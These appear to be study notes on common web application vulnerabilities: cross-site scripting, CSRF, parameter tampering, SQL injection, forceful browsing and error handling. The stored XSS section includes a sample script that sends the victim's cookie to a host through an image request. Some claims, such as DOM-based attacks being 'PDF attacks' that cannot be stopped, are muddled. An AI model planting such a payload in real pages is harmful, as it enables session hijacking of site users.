Web Application Vulnerabilities:

3.1.5: Cross site scripting:

- Ability to make user-agent (e.g browser) to run hacker scripts while in the context
of the hacked application.
3-types of cross-site scripting attacks:
Stored: bulletin board manipulation attack a bulletin board or auction posting,
where users can submit comments to be viewed by others. Malicious Javascript can
be submitted instead of plain text.
E.g user can fill out an auction for an item and include the following script in the
bottom of the description
<script language = javascript>
document.write (<img src=http://localhost/?url= + document.location +
&cookie= + document.cookie + >);
</script>
The above script inserts html into the page which looks like regular html tag, but
includes current users cookie value on image request. Any other user using viewing
this img will send cookie info to the webserver as in the script. Now the hacker can
use the cookie info to iimpersonate them on various sites.
Reflected: used in conjunction with phishing
Stored and reflected attacks can be stopped by making sure application doesnt
echo back info received from user.
DOM-based: are PDF attacks cannot be stopped because as they are not controlled
by the application.
3.1.6: Cross Site Request Forgery (CSRF)
Forces a logged-on victims browser to send a request to a vulnerable web
application, which then performs chosen action on behalf of the victim.
Application with following characterstics are at risk
-

Has no authorization chcks for vulnerable actions

Processes an action if default login is given the request
Authorizes requests based on only credentials that are automatically
submitted such s session cookie, if currently logged into web application

CSRF work work because users authorization credential is automatically included in

the requests by browsers, though the attacker simply didnt supply that credential.
3.1.7: 3rd party misconfiguration
- companies partner with 3rd party products
- as part of business model, access must be granted to sensitive data. Without
security attention to this data, organizations are at risk.
- e.g attacker can create files on server if NFS permissions are given.
3.1.8: Parameter Tampering

- involves manipulation of URL parameters to retrieve info which is otherwise not

available to user.
- e.g changing URI to retrieve more info than expected.
- others include, form fields, internal modules, attribute parameters, which
categorize the behavior of the application.
- tamper cookies, HTTP headers , query strings
- secure cookies can be modified by client. Form fields can be changed.
3.1.9: SQL Injection
- exploits knowledge or educated guesses about server-side technology driving the
application
- attacker inserts sql commands into form intead of legitimate data.
- attaker finds a parameter that application passes to database, embeds malicious
sql commands into the content of parameter and tricks web app to forward query
to db
- this can cause access, corrupt, damage to the db.
- shell commands also produce injection attacks and needs to be carefully scrubbed
when passed from http request.
3.1.10: Forceful browsing
- directly accessing a page that should not be shown to a user or which is not a link
for public access.
- editing url in browser to gain access to files that are not intended to be public.
- eg. Skipping login & registration pages to get to pages behind it.
3.1.11: Improper error handling
- detailed internal error messages are revealed.
- such as db dumps, stack traces.

RISK Mitigation & ASM